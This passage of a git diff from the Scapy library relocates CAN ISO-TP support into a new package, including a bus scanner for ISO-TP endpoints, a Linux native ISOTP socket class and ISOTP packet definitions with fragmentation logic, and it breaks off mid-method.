type: int - id_list, # type: Union[List[int], Dict[int, Tuple[Packet, int]]] - noise_ids, # type: Optional[List[int]] - extended, # type: bool - packet, # type: Packet - verbose=False # type: bool -): - # type: (...) -> None - """Callback for sniff function when packet received - - If received packet is a FlowControl and not in noise_ids append it - to id_list. - - :param id_value: packet id of send packet - :param id_list: list of received IDs - :param noise_ids: list of packet IDs which will not be considered when - received during scan - :param extended: boolean if extended scan - :param packet: received packet - :param verbose: displays information during scan - """ - if packet.flags and packet.flags != "extended": - return - - if noise_ids is not None and packet.identifier in noise_ids: - return - - try: - index = 1 if extended else 0 - isotp_pci = orb(packet.data[index]) >> 4 - isotp_fc = orb(packet.data[index]) & 0x0f - if isotp_pci == 3 and 0 <= isotp_fc <= 2: - if verbose: - print("[+] Found flow-control frame from identifier 0x%03x" - " when testing identifier 0x%03x" % - (packet.identifier, id_value)) - if isinstance(id_list, dict): - id_list[id_value] = (packet, packet.identifier) - elif isinstance(id_list, list): - id_list.append(id_value) - else: - raise TypeError("Unknown type of id_list") - else: - if noise_ids is not None: - noise_ids.append(packet.identifier) - except Exception as e: - print("[!] Unknown message Exception: %s on packet: %s" % - (e, repr(packet))) - - -def scan(sock, # type: SuperSocket - scan_range=range(0x800), # type: Iterable[int] - noise_ids=None, # type: Optional[List[int]] - sniff_time=0.1, # type: float - extended_can_id=False, # type: bool - verbose=False # type: bool - ): # type: (...) -> Dict[int, Tuple[Packet, int]] - """Scan and return dictionary of detections - - ISOTP-Scan - NO extended IDs - found_packets = Dictionary with Send-to-ID as - key and a tuple (received packet, Recv_ID) - - :param sock: socket for can interface - :param scan_range: hexadecimal range of IDs to scan. Default is 0x0 - 0x7ff - :param noise_ids: list of packet IDs which will not be tested during scan - :param sniff_time: time the scan waits for isotp flow control responses - after sending a first frame - :param extended_can_id: Send extended can frames - :param verbose: displays information during scan - :return: Dictionary with all found packets - """ - return_values = dict() # type: Dict[int, Tuple[Packet, int]] - for value in scan_range: - if noise_ids and value in noise_ids: - continue - - sock.sniff(prn=lambda pkt: get_isotp_fc(value, return_values, - noise_ids, False, pkt, - verbose), - timeout=sniff_time, - started_callback=lambda: sock.send( - get_isotp_packet(value, False, extended_can_id))) - - cleaned_ret_val = dict() # type: Dict[int, Tuple[Packet, int]] - - for tested_id in return_values.keys(): - for value in range(max(0, tested_id - 2), tested_id + 2, 1): - sock.sniff(prn=lambda pkt: get_isotp_fc(value, cleaned_ret_val, - noise_ids, False, pkt, - verbose), - timeout=sniff_time * 10, - started_callback=lambda: sock.send( - get_isotp_packet(value, False, extended_can_id))) - - return cleaned_ret_val - - -def scan_extended(sock, # type: SuperSocket - scan_range=range(0x800), # type: Iterable[int] - scan_block_size=32, # type: int - extended_scan_range=range(0x100), # type: Iterable[int] - noise_ids=None, # type: Optional[List[int]] - sniff_time=0.1, # type: float - extended_can_id=False, # type: bool - verbose=False # type: bool - ): # type: (...) -> Dict[int, Tuple[Packet, int]] - """Scan with ISOTP extended addresses and return dictionary of detections - - If an answer-packet found -> slow scan with - single packages with extended ID 0 - 255 - found_packets = Dictionary with Send-to-ID - as key and a tuple (received packet, Recv_ID) - - :param sock: socket for can interface - :param scan_range: hexadecimal range of IDs to scan. Default is 0x0 - 0x7ff - :param scan_block_size: count of packets send at once - :param extended_scan_range: range to search for extended ISOTP addresses - :param noise_ids: list of packet IDs which will not be tested during scan - :param sniff_time: time the scan waits for isotp flow control responses - after sending a first frame - :param extended_can_id: Send extended can frames - :param verbose: displays information during scan - :return: Dictionary with all found packets - """ - return_values = dict() # type: Dict[int, Tuple[Packet, int]] - scan_block_size = scan_block_size or 1 - - for value in scan_range: - if noise_ids and value in noise_ids: - continue - - pkt = get_isotp_packet( - value, extended=True, extended_can_id=extended_can_id) - id_list = [] # type: List[int] - r = list(extended_scan_range) - for ext_isotp_id in range(r[0], r[-1], scan_block_size): - sock.sniff(prn=lambda p: get_isotp_fc(ext_isotp_id, id_list, - noise_ids, True, p, - verbose), - timeout=sniff_time * 3, - started_callback=lambda: send_multiple_ext( - sock, ext_isotp_id, pkt, scan_block_size)) - # sleep to prevent flooding - time.sleep(sniff_time) - - # remove duplicate IDs - id_list = list(set(id_list)) - for ext_isotp_id in id_list: - for ext_id in range(max(ext_isotp_id - 2, 0), - min(ext_isotp_id + scan_block_size + 2, 256)): - pkt.extended_address = ext_id - full_id = (value << 8) + ext_id - sock.sniff(prn=lambda pkt: get_isotp_fc(full_id, - return_values, - noise_ids, True, - pkt, verbose), - timeout=sniff_time * 2, - started_callback=lambda: sock.send(pkt)) - - return return_values - - -def ISOTPScan(sock, # type: SuperSocket - scan_range=range(0x7ff + 1), # type: Iterable[int] - extended_addressing=False, # type: bool - extended_scan_range=range(0x100), # type: Iterable[int] - noise_listen_time=2, # type: int - sniff_time=0.1, # type: float - output_format=None, # type: Optional[str] - can_interface=None, # type: Optional[str] - extended_can_id=False, # type: bool - verbose=False # type: bool - ): - # type: (...) -> Union[str, List[SuperSocket]] - """Scan for ISOTP Sockets on a bus and return findings - - Scan for ISOTP Sockets in the defined range and returns found sockets - in a specified format. The format can be: - - - text: human readable output - - code: python code for copy&paste - - sockets: if output format is not specified, ISOTPSockets will be - created and returned in a list - - :param sock: CANSocket object to communicate with the bus under scan - :param scan_range: range of CAN-Identifiers to scan. Default is 0x0 - 0x7ff - :param extended_addressing: scan with ISOTP extended addressing - :param extended_scan_range: range for ISOTP extended addressing values - :param noise_listen_time: seconds to listen for default communication on - the bus - :param sniff_time: time the scan waits for isotp flow control responses - after sending a first frame - :param output_format: defines the format of the returned results - (text, code or sockets). Provide a string e.g. - "text". Default is "socket". - :param can_interface: interface used to create the returned code/sockets - :param extended_can_id: Use Extended CAN-Frames - :param verbose: displays information during scan - :return: - """ - if verbose: - print("Filtering background noise...") - - # Send dummy packet. In most cases, this triggers activity on the bus. - - dummy_pkt = CAN(identifier=0x123, - data=b'\xaa\xbb\xcc\xdd\xee\xff\xaa\xbb') - - background_pkts = sock.sniff(timeout=noise_listen_time, - started_callback=lambda: - sock.send(dummy_pkt)) - - noise_ids = list(set(pkt.identifier for pkt in background_pkts)) - - if extended_addressing: - found_packets = scan_extended(sock, scan_range, - extended_scan_range=extended_scan_range, - noise_ids=noise_ids, - sniff_time=sniff_time, - extended_can_id=extended_can_id, - verbose=verbose) - else: - found_packets = scan(sock, scan_range, - noise_ids=noise_ids, - sniff_time=sniff_time, - extended_can_id=extended_can_id, - verbose=verbose) - - filter_periodic_packets(found_packets, verbose) - - if output_format == "text": - return generate_text_output(found_packets, extended_addressing) - - if output_format == "code": - return generate_code_output(found_packets, can_interface, - extended_addressing) - - return generate_isotp_list(found_packets, can_interface or sock, - extended_addressing) - - -def generate_text_output(found_packets, extended_addressing=False): - # type: (Dict[int, Tuple[Packet, int]], bool) -> str - """Generate a human readable output from the result of the `scan` or the - `scan_extended` function. - - :param found_packets: result of the `scan` or `scan_extended` function - :param extended_addressing: print results from a scan with - ISOTP extended addressing - :return: human readable scan results - """ - if not found_packets: - return "No packets found." - - text = "\nFound %s ISOTP-FlowControl Packet(s):" % len(found_packets) - for pack in found_packets: - if extended_addressing: - send_id = pack // 256 - send_ext = pack - (send_id * 256) - ext_id = hex(orb(found_packets[pack][0].data[0])) - text += "\nSend to ID: %s" \ - "\nSend to extended ID: %s" \ - "\nReceived ID: %s" \ - "\nReceived extended ID: %s" \ - "\nMessage: %s" % \ - (hex(send_id), hex(send_ext), - hex(found_packets[pack][0].identifier), ext_id, - repr(found_packets[pack][0])) - else: - text += "\nSend to ID: %s" \ - "\nReceived ID: %s" \ - "\nMessage: %s" % \ - (hex(pack), - hex(found_packets[pack][0].identifier), - repr(found_packets[pack][0])) - - padding = found_packets[pack][0].length == 8 - if padding: - text += "\nPadding enabled" - else: - text += "\nNo Padding" - - text += "\n" - return text - - -def generate_code_output(found_packets, can_interface="iface", - extended_addressing=False): - # type: (Dict[int, Tuple[Packet, int]], Optional[str], bool) -> str - """Generate a copy&past-able output from the result of the `scan` or - the `scan_extended` function. - - :param found_packets: result of the `scan` or `scan_extended` function - :param can_interface: description string for a CAN interface to be - used for the creation of the output. - :param extended_addressing: print results from a scan with ISOTP - extended addressing - :return: Python-code as string to generate all found sockets - """ - result = "" - if not found_packets: - return result - - header = "\n\nimport can\n" \ - "conf.contribs['CANSocket'] = {'use-python-can': %s}\n" \ - "load_contrib('cansocket')\n" \ - "load_contrib('isotp')\n\n" % PYTHON_CAN - - for pack in found_packets: - if extended_addressing: - send_id = pack // 256 - send_ext = pack - (send_id * 256) - ext_id = orb(found_packets[pack][0].data[0]) - result += "ISOTPSocket(%s, sid=0x%x, did=0x%x, padding=%s, " \ - "extended_addr=0x%x, extended_rx_addr=0x%x, " \ - "basecls=ISOTP)\n" % \ - (can_interface, send_id, - int(found_packets[pack][0].identifier), - found_packets[pack][0].length == 8, - send_ext, - ext_id) - - else: - result += "ISOTPSocket(%s, sid=0x%x, did=0x%x, padding=%s, " \ - "basecls=ISOTP)\n" % \ - (can_interface, pack, - int(found_packets[pack][0].identifier), - found_packets[pack][0].length == 8) - return header + result - - -def generate_isotp_list(found_packets, # type: Dict[int, Tuple[Packet, int]] - can_interface, # type: Union[SuperSocket, str] - extended_addressing=False # type: bool - ): - # type: (...) -> List[SuperSocket] - """Generate a list of ISOTPSocket objects from the result of the `scan` or - the `scan_extended` function. - - :param found_packets: result of the `scan` or `scan_extended` function - :param can_interface: description string for a CAN interface to be - used for the creation of the output. - :param extended_addressing: print results from a scan with ISOTP - extended addressing - :return: A list of all found ISOTPSockets - """ - socket_list = [] # type: List[SuperSocket] - for pack in found_packets: - pkt = found_packets[pack][0] - - dest_id = pkt.identifier - pad = True if pkt.length == 8 else False - - if extended_addressing: - source_id = pack >> 8 - source_ext = int(pack - (source_id * 256)) - dest_ext = orb(pkt.data[0]) - socket_list.append(ISOTPSocket(can_interface, sid=source_id, - extended_addr=source_ext, - did=dest_id, - extended_rx_addr=dest_ext, - padding=pad, - basecls=ISOTP)) - else: - source_id = pack - socket_list.append(ISOTPSocket(can_interface, sid=source_id, - did=dest_id, padding=pad, - basecls=ISOTP)) - return socket_list diff --git a/scapy/contrib/isotp/__init__.py b/scapy/contrib/isotp/__init__.py new file mode 100644 index 00000000000..6c38e29a890 --- /dev/null +++ b/scapy/contrib/isotp/__init__.py @@ -0,0 +1,43 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# This program is published under a GPLv2 license + +# scapy.contrib.description = ISO-TP (ISO 15765-2) +# scapy.contrib.status = loads + +from scapy.consts import LINUX +import scapy.modules.six as six +from scapy.config import conf +from scapy.error import log_loading + +from scapy.contrib.isotp.isotp_packet import ISOTP, ISOTPHeader, \ + ISOTPHeaderEA, ISOTP_SF, ISOTP_FF, ISOTP_CF, ISOTP_FC +from scapy.contrib.isotp.isotp_utils import ISOTPSession, \ + ISOTPMessageBuilder +from scapy.contrib.isotp.isotp_soft_socket import ISOTPSoftSocket +from scapy.contrib.isotp.isotp_scanner import isotp_scan + +__all__ = ["ISOTP", "ISOTPHeader", "ISOTPHeaderEA", "ISOTP_SF", "ISOTP_FF", + "ISOTP_CF", "ISOTP_FC", "ISOTPSoftSocket", "ISOTPSession", + "ISOTPSocket", "ISOTPMessageBuilder", "isotp_scan", + "USE_CAN_ISOTP_KERNEL_MODULE"] + +USE_CAN_ISOTP_KERNEL_MODULE = False + +if six.PY3 and LINUX: + try: + if conf.contribs['ISOTP']['use-can-isotp-kernel-module']: + USE_CAN_ISOTP_KERNEL_MODULE = True + except KeyError: + log_loading.info( + "Specify 'conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': True}' " # noqa: E501 + "to enable usage of can-isotp kernel module.") + + from scapy.contrib.isotp.isotp_native_socket import ISOTPNativeSocket + __all__.append("ISOTPNativeSocket") + +if USE_CAN_ISOTP_KERNEL_MODULE: + ISOTPSocket = ISOTPNativeSocket +else: + ISOTPSocket = ISOTPSoftSocket diff --git a/scapy/contrib/isotp/isotp_native_socket.py b/scapy/contrib/isotp/isotp_native_socket.py new file mode 100644 index 00000000000..13ec1be2e48 --- /dev/null +++ b/scapy/contrib/isotp/isotp_native_socket.py @@ -0,0 +1,362 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# This program is published under a GPLv2 license + +# scapy.contrib.description = ISO-TP (ISO 15765-2) Native Socket Library +# scapy.contrib.status = library + +import ctypes +from ctypes.util import find_library +import struct +import socket + +from scapy.compat import Optional, Union, Tuple, Type, cast +from scapy.packet import Packet +import scapy.modules.six as six +from scapy.error import Scapy_Exception, warning +from scapy.supersocket import SuperSocket +from scapy.data import SO_TIMESTAMPNS +from scapy.config import conf +from scapy.arch.linux import get_last_packet_timestamp, SIOCGIFINDEX +from scapy.contrib.isotp.isotp_packet import ISOTP +from scapy.layers.can import CAN_MTU, CAN_MAX_DLEN + + +LIBC = ctypes.cdll.LoadLibrary(find_library("c")) # type: ignore + +CAN_ISOTP = 6 # ISO 15765-2 Transport Protocol + +SOL_CAN_BASE = 100 # from can.h +SOL_CAN_ISOTP = SOL_CAN_BASE + CAN_ISOTP +# /* for socket options affecting the socket (not the global system) */ +CAN_ISOTP_OPTS = 1 # /* pass struct can_isotp_options */ +CAN_ISOTP_RECV_FC = 2 # /* pass struct can_isotp_fc_options */ + +# /* sockopts to force stmin timer values for protocol regression tests */ +CAN_ISOTP_TX_STMIN = 3 # /* pass __u32 value in nano secs */ +CAN_ISOTP_RX_STMIN = 4 # /* pass __u32 value in nano secs */ +CAN_ISOTP_LL_OPTS = 5 # /* pass struct can_isotp_ll_options */ + +CAN_ISOTP_LISTEN_MODE = 0x001 # /* listen only (do not send FC) */ +CAN_ISOTP_EXTEND_ADDR = 0x002 # /* enable extended addressing */ +CAN_ISOTP_TX_PADDING = 0x004 # /* enable CAN frame padding tx path */ +CAN_ISOTP_RX_PADDING = 0x008 # /* enable CAN frame padding rx path */ +CAN_ISOTP_CHK_PAD_LEN = 0x010 # /* check received CAN frame padding */ +CAN_ISOTP_CHK_PAD_DATA = 0x020 # /* check received CAN frame padding */ +CAN_ISOTP_HALF_DUPLEX = 0x040 # /* half duplex error state handling */ +CAN_ISOTP_FORCE_TXSTMIN = 0x080 # /* ignore stmin from received FC */ +CAN_ISOTP_FORCE_RXSTMIN = 0x100 # /* ignore CFs depending on rx stmin */ +CAN_ISOTP_RX_EXT_ADDR = 0x200 # /* different rx extended addressing */ + +# /* default values */ +CAN_ISOTP_DEFAULT_FLAGS = 0 +CAN_ISOTP_DEFAULT_EXT_ADDRESS = 0x00 +CAN_ISOTP_DEFAULT_PAD_CONTENT = 0xCC # /* prevent bit-stuffing */ +CAN_ISOTP_DEFAULT_FRAME_TXTIME = 0 +CAN_ISOTP_DEFAULT_RECV_BS = 0 +CAN_ISOTP_DEFAULT_RECV_STMIN = 0x00 +CAN_ISOTP_DEFAULT_RECV_WFTMAX = 0 +CAN_ISOTP_DEFAULT_LL_MTU = CAN_MTU +CAN_ISOTP_DEFAULT_LL_TX_DL = CAN_MAX_DLEN +CAN_ISOTP_DEFAULT_LL_TX_FLAGS = 0 + + +class tp(ctypes.Structure): + # This struct is only used within the sockaddr_can struct + _fields_ = [("rx_id", ctypes.c_uint32), + ("tx_id", ctypes.c_uint32)] + + +class addr_info(ctypes.Union): + # This struct is only used within the sockaddr_can struct + # This union is to future proof for future can address information + _fields_ = [("tp", tp)] + + +class sockaddr_can(ctypes.Structure): + # See /usr/include/linux/can.h for original struct + _fields_ = [("can_family", ctypes.c_uint16), + ("can_ifindex", ctypes.c_int), + ("can_addr", addr_info)] + + +class ifreq(ctypes.Structure): + # The two fields in this struct were originally unions. + # See /usr/include/net/if.h for original struct + _fields_ = [("ifr_name", ctypes.c_char * 16), + ("ifr_ifindex", ctypes.c_int)] + + +class ISOTPNativeSocket(SuperSocket): + desc = "read/write packets at a given CAN interface using CAN_ISOTP socket " # noqa: E501 + can_isotp_options_fmt = "@2I4B" + can_isotp_fc_options_fmt = "@3B" + can_isotp_ll_options_fmt = "@3B" + sockaddr_can_fmt = "@H3I" + auxdata_available = True + + def __build_can_isotp_options( + self, + flags=CAN_ISOTP_DEFAULT_FLAGS, + frame_txtime=CAN_ISOTP_DEFAULT_FRAME_TXTIME, + ext_address=CAN_ISOTP_DEFAULT_EXT_ADDRESS, + txpad_content=CAN_ISOTP_DEFAULT_PAD_CONTENT, + rxpad_content=CAN_ISOTP_DEFAULT_PAD_CONTENT, + rx_ext_address=CAN_ISOTP_DEFAULT_EXT_ADDRESS): + # type: (int, int, int, int, int, int) -> bytes + return struct.pack(self.can_isotp_options_fmt, + flags, + frame_txtime, + ext_address, + txpad_content, + rxpad_content, + rx_ext_address) + + # == Must use native not standard types for packing == + # struct can_isotp_options { + # __u32 flags; /* set flags for isotp behaviour. */ + # /* __u32 value : flags see below */ + # + # __u32 frame_txtime; /* frame transmission time (N_As/N_Ar) */ + # /* __u32 value : time in nano secs */ + # + # __u8 ext_address; /* set address for extended addressing */ + # /* __u8 value : extended address */ + # + # __u8 txpad_content; /* set content of padding byte (tx) */ + # /* __u8 value : content on tx path */ + # + # __u8 rxpad_content; /* set content of padding byte (rx) */ + # /* __u8 value : content on rx path */ + # + # __u8 rx_ext_address; /* set address for extended addressing */ + # /* __u8 value : extended address (rx) */ + # }; + + def __build_can_isotp_fc_options(self, + bs=CAN_ISOTP_DEFAULT_RECV_BS, + stmin=CAN_ISOTP_DEFAULT_RECV_STMIN, + wftmax=CAN_ISOTP_DEFAULT_RECV_WFTMAX): + # type: (int, int, int) -> bytes + return struct.pack(self.can_isotp_fc_options_fmt, + bs, + stmin, + wftmax) + + # == Must use native not standard types for packing == + # struct can_isotp_fc_options { + # + # __u8 bs; /* blocksize provided in FC frame */ + # /* __u8 value : blocksize. 0 = off */ + # + # __u8 stmin; /* separation time provided in FC frame */ + # /* __u8 value : */ + # /* 0x00 - 0x7F : 0 - 127 ms */ + # /* 0x80 - 0xF0 : reserved */ + # /* 0xF1 - 0xF9 : 100 us - 900 us */ + # /* 0xFA - 0xFF : reserved */ + # + # __u8 wftmax; /* max. number of wait frame transmiss. */ + # /* __u8 value : 0 = omit FC N_PDU WT */ + # }; + + def __build_can_isotp_ll_options(self, + mtu=CAN_ISOTP_DEFAULT_LL_MTU, + tx_dl=CAN_ISOTP_DEFAULT_LL_TX_DL, + tx_flags=CAN_ISOTP_DEFAULT_LL_TX_FLAGS + ): + # type: (int, int, int) -> bytes + return struct.pack(self.can_isotp_ll_options_fmt, + mtu, + tx_dl, + tx_flags) + + # == Must use native not standard types for packing == + # struct can_isotp_ll_options { + # + # __u8 mtu; /* generated & accepted CAN frame type */ + # /* __u8 value : */ + # /* CAN_MTU (16) -> standard CAN 2.0 */ + # /* CANFD_MTU (72) -> CAN FD frame */ + # + # __u8 tx_dl; /* tx link layer data length in bytes */ + # /* (configured maximum payload length) */ + # /* __u8 value : 8,12,16,20,24,32,48,64 */ + # /* => rx path supports all LL_DL values */ + # + # __u8 tx_flags; /* set into struct canfd_frame.flags */ + # /* at frame creation: e.g. CANFD_BRS */ + # /* Obsolete when the BRS flag is fixed */ + # /* by the CAN netdriver configuration */ + # }; + + def __get_sock_ifreq(self, sock, iface): + # type: (socket.socket, str) -> ifreq + socket_id = ctypes.c_int(sock.fileno()) + ifr = ifreq() + ifr.ifr_name = iface.encode('ascii') + ret = LIBC.ioctl(socket_id, SIOCGIFINDEX, ctypes.byref(ifr)) + + if ret < 0: + m = u'Failure while getting "{}" interface index.'.format( + iface) + raise Scapy_Exception(m) + return ifr + + def __bind_socket(self, sock, iface, sid, did): + # type: (socket.socket, str, int, int) -> None + socket_id = ctypes.c_int(sock.fileno()) + ifr = self.__get_sock_ifreq(sock, iface) + + if sid > 0x7ff: + sid = sid | socket.CAN_EFF_FLAG + if did > 0x7ff: + did = did | socket.CAN_EFF_FLAG + + # select the CAN interface and bind the socket to it + addr = sockaddr_can(ctypes.c_uint16(socket.PF_CAN), + ifr.ifr_ifindex, + addr_info(tp(ctypes.c_uint32(did), + ctypes.c_uint32(sid)))) + + error = LIBC.bind(socket_id, ctypes.byref(addr), + ctypes.sizeof(addr)) + + if error < 0: + warning("Couldn't bind socket") + + def __set_option_flags(self, + sock, # type: socket.socket + extended_addr=None, # type: Optional[int] + extended_rx_addr=None, # type: Optional[int] + listen_only=False, # type: bool + padding=False, # type: bool + transmit_time=100 # type: int + ): + # type: (...) -> None + option_flags = CAN_ISOTP_DEFAULT_FLAGS + if extended_addr is not None: + option_flags = option_flags | CAN_ISOTP_EXTEND_ADDR + else: + extended_addr = CAN_ISOTP_DEFAULT_EXT_ADDRESS + + if extended_rx_addr is not None: + option_flags = option_flags | CAN_ISOTP_RX_EXT_ADDR + else: + extended_rx_addr = CAN_ISOTP_DEFAULT_EXT_ADDRESS + + if listen_only: + option_flags = option_flags | CAN_ISOTP_LISTEN_MODE + + if padding: + option_flags = option_flags | CAN_ISOTP_TX_PADDING | CAN_ISOTP_RX_PADDING # noqa: E501 + + sock.setsockopt(SOL_CAN_ISOTP, + CAN_ISOTP_OPTS, + self.__build_can_isotp_options( + frame_txtime=transmit_time, + flags=option_flags, + ext_address=extended_addr, + rx_ext_address=extended_rx_addr)) + + def __init__(self, + iface=None, # type: Optional[Union[str, SuperSocket]] + sid=0, # type: int + did=0, # type: int + extended_addr=None, # type: Optional[int] + extended_rx_addr=None, # type: Optional[int] + listen_only=False, # type: bool + padding=False, # type: bool + transmit_time=100, # type: int + basecls=ISOTP # type: Type[Packet] + ): + # type: (...) -> None + + if not isinstance(iface, six.string_types): + # This is for interoperability with ISOTPSoftSockets. + # If a NativeCANSocket is provided, the interface name of this + # socket is extracted and an ISOTPNativeSocket will be opened + # on this interface. + iface = cast(SuperSocket, iface) + if hasattr(iface, "ins") and hasattr(iface.ins, "getsockname"): + iface = iface.ins.getsockname() + if isinstance(iface, tuple): + iface = cast(str, iface[0]) + else: + raise Scapy_Exception("Provide a string or a CANSocket " + "object as iface parameter") + + self.iface = cast(str, iface) or conf.contribs['NativeCANSocket']['iface'] # noqa: E501 + self.can_socket = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, + CAN_ISOTP) + self.__set_option_flags(self.can_socket, + extended_addr, + extended_rx_addr, + listen_only, + padding, + transmit_time) + + self.src = sid + self.dst = did + self.exsrc = extended_addr + self.exdst = extended_rx_addr + + self.can_socket.setsockopt(SOL_CAN_ISOTP, + CAN_ISOTP_RECV_FC, + self.__build_can_isotp_fc_options()) + self.can_socket.setsockopt(SOL_CAN_ISOTP, + CAN_ISOTP_LL_OPTS, + self.__build_can_isotp_ll_options()) + self.can_socket.setsockopt( + socket.SOL_SOCKET, + SO_TIMESTAMPNS, + 1 + ) + + self.__bind_socket(self.can_socket, self.iface, sid, did) + self.ins = self.can_socket + self.outs = self.can_socket + if basecls is None: + warning('Provide a basecls ') + self.basecls = basecls + + def recv_raw(self, x=0xffff): + # type: (int) -> Tuple[Optional[Type[Packet]], Optional[bytes], Optional[float]] # noqa: E501 + """ + Receives a packet, then returns a tuple containing + (cls, pkt_data, time) + """ + try: + pkt, _, ts = self._recv_raw(self.ins, x) + except BlockingIOError: # noqa: F821 + warning('Captured no data, socket in non-blocking mode.') + return None, None, None + except socket.timeout: + warning('Captured no data, socket read timed out.') + return None, None, None + except OSError: + # something bad happened (e.g. the interface went down) + warning("Captured no data.") + self.close() + return None, None, None + + if ts is None: + ts = get_last_packet_timestamp(self.ins) + return self.basecls, pkt, ts + + def recv(self, x=0xffff): + # type: (int) -> Optional[Packet] + msg = SuperSocket.recv(self, x) + if msg is None: + return msg + + if hasattr(msg, "src"): + msg.src = self.src + if hasattr(msg, "dst"): + msg.dst = self.dst + if hasattr(msg, "exsrc"): + msg.exsrc = self.exsrc + if hasattr(msg, "exdst"): + msg.exdst = self.exdst + return msg diff --git a/scapy/contrib/isotp/isotp_packet.py b/scapy/contrib/isotp/isotp_packet.py new file mode 100644 index 00000000000..94c98ea454a --- /dev/null +++ b/scapy/contrib/isotp/isotp_packet.py @@ -0,0 +1,296 @@ + +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# This program is published under a GPLv2 license + +# scapy.contrib.description = ISO-TP (ISO 15765-2) Packet Definitions +# scapy.contrib.status = library + +import struct + +from scapy.compat import Optional, List, Tuple, Any, Type +from scapy.packet import Packet +from scapy.fields import BitField, FlagsField, StrLenField, \ + ThreeBytesField, XBitField, ConditionalField, \ + BitEnumField, ByteField, XByteField, BitFieldLenField, StrField +from scapy.compat import chb, orb +from scapy.layers.can import CAN +from scapy.error import Scapy_Exception, warning + +CAN_MAX_IDENTIFIER = (1 << 29) - 1 # Maximum 29-bit identifier +CAN_MTU = 16 +CAN_MAX_DLEN = 8 +ISOTP_MAX_DLEN_2015 = (1 << 32) - 1 # Maximum for 32-bit FF_DL +ISOTP_MAX_DLEN = (1 << 12) - 1 # Maximum for 12-bit FF_DL +ISOTP_TYPES = {0: 'single', + 1: 'first', + 2: 'consecutive', + 3: 'flow_control'} + + +N_PCI_SF = 0x00 # /* single frame */ +N_PCI_FF = 0x10 # /* first frame */ +N_PCI_CF = 0x20 # /* consecutive frame */ +N_PCI_FC = 0x30 # /* flow control */ + + +class ISOTP(Packet): + """Packet class for ISOTP messages. This class contains additional + slots for source address (src), destination address (dst), + extended source address (exsrc) and + extended destination address (exdst) information. This information + gets filled from ISOTPSockets or the ISOTPMessageBuilder, if it + is available. Address information is not used for Packet comparison. + + :param args: Arguments for Packet init, for example bytes string + :param kwargs: Keyword arguments for Packet init. + """ + name = 'ISOTP' + fields_desc = [ + StrField('data', b"") + ] + __slots__ = Packet.__slots__ + ["src", "dst", "exsrc", "exdst"] + + def __init__(self, *args, **kwargs): + # type: (Any, Any) -> None + self.src = kwargs.pop("src", None) # type: Optional[int] + self.dst = kwargs.pop("dst", None) # type: Optional[int] + self.exsrc = kwargs.pop("exsrc", None) # type: Optional[int] + self.exdst = kwargs.pop("exdst", None) # type: Optional[int] + Packet.__init__(self, *args, **kwargs) + self.validate_fields() + + def validate_fields(self): + # type: () -> None + """Helper function to validate information in src, dst, exsrc and exdst + slots + """ + if self.src is not None: + if not 0 <= self.src <= CAN_MAX_IDENTIFIER: + raise Scapy_Exception("src is not a valid CAN identifier") + if self.dst is not None: + if not 0 <= self.dst <= CAN_MAX_IDENTIFIER: + raise Scapy_Exception("dst is not a valid CAN identifier") + if self.exsrc is not None: + if not 0 <= self.exsrc <= 0xff: + raise Scapy_Exception("exsrc is not a byte") + if self.exdst is not None: + if not 0 <= self.exdst <= 0xff: + raise Scapy_Exception("exdst is not a byte") + + def fragment(self, *args, **kargs): + # type: (*Any, **Any) -> List[Packet] + """Helper function to fragment an ISOTP message into multiple + CAN frames. + + :return: A list of CAN frames + """ + data_bytes_in_frame = 7 + if self.exdst is not None: + data_bytes_in_frame = 6 + + if len(self.data) > ISOTP_MAX_DLEN_2015: + raise Scapy_Exception("Too much data in ISOTP message") + + if len(self.data) <= data_bytes_in_frame: + # We can do this in a single frame + frame_data = struct.pack('B', len(self.data)) + self.data + if self.exdst: + frame_data = struct.pack('B', self.exdst) + frame_data + + if self.dst is None or self.dst <= 0x7ff: + pkt = CAN(identifier=self.dst, data=frame_data) + else: + pkt = CAN(identifier=self.dst, flags="extended", + data=frame_data) + return [pkt] + + # Construct the first frame + if len(self.data) <= ISOTP_MAX_DLEN: + frame_header = struct.pack(">H", len(self.data) + 0x1000) + else: + frame_header = struct.pack(">HI", 0x1000, len(self.data)) + if self.exdst: + frame_header = struct.pack('B', self.exdst) + frame_header + idx = 8 - len(frame_header) + frame_data = self.data[0:idx] + if self.dst is None or self.dst <= 0x7ff: + frame = CAN(identifier=self.dst, data=frame_header + frame_data) + else: + frame = CAN(identifier=self.dst, flags="extended", + data=frame_header + frame_data) + + # Construct consecutive frames + n = 1 + pkts = [frame] + while idx < len(self.data): + frame_data = self.data[idx:idx + data_bytes_in_frame] + frame_header = struct.pack("b", (n % 16) + N_PCI_CF) + + n += 1 + idx += len(frame_data) + + if self.exdst: + frame_header = struct.pack('B', self.exdst) + frame_header + if self.dst is None or self.dst <= 0x7ff: + pkt = CAN(identifier=self.dst, data=frame_header + frame_data) + else: + pkt = CAN(identifier=self.dst, flags="extended", + data=frame_header + frame_data) + pkts.append(pkt) + return pkts + + @staticmethod + def defragment(can_frames, use_extended_addressing=None): + # type: (List[Packet], Optional[bool]) -> Optional[ISOTP] + """Helper function to defragment a list of CAN frames to one ISOTP + message + + :param can_frames: A list of CAN frames + :param use_extended_addressing: Specify if extended ISO-TP addressing + is used in the packets for + defragmentation. + :return: An ISOTP message containing the data of the CAN frames or None + """ + from scapy.contrib.isotp.isotp_utils import ISOTPMessageBuilder + + if len(can_frames) == 0: + raise Scapy_Exception("ISOTP.defragment called with 0 frames") + + dst = can_frames[0].identifier + if any(frame.identifier != dst for frame in can_frames): + warning("Not all CAN frames have the same identifier") + + parser = ISOTPMessageBuilder(use_extended_addressing) + parser.feed(can_frames) + + results = [] + for p in parser: + if (use_extended_addressing is True and p.exdst is not None) \ + or (use_extended_addressing is False and p.exdst is None) \ + or (use_extended_addressing is None): + results.append(p) + + if not results: + return None + + if len(results) > 1: + warning("More than one ISOTP frame could be defragmented from the " + "provided CAN frames, only returning the first one.") + + return results[0] + + +class ISOTPHeader(CAN): + name = 'ISOTPHeader' + fields_desc = [ + FlagsField('flags', 0, 3, ['error', + 'remote_transmission_request', + 'extended']), + XBitField('identifier', 0, 29), + ByteField('length', None), + ThreeBytesField('reserved', 0) + ] + + def extract_padding(self, p): + # type: (bytes) -> Tuple[bytes, 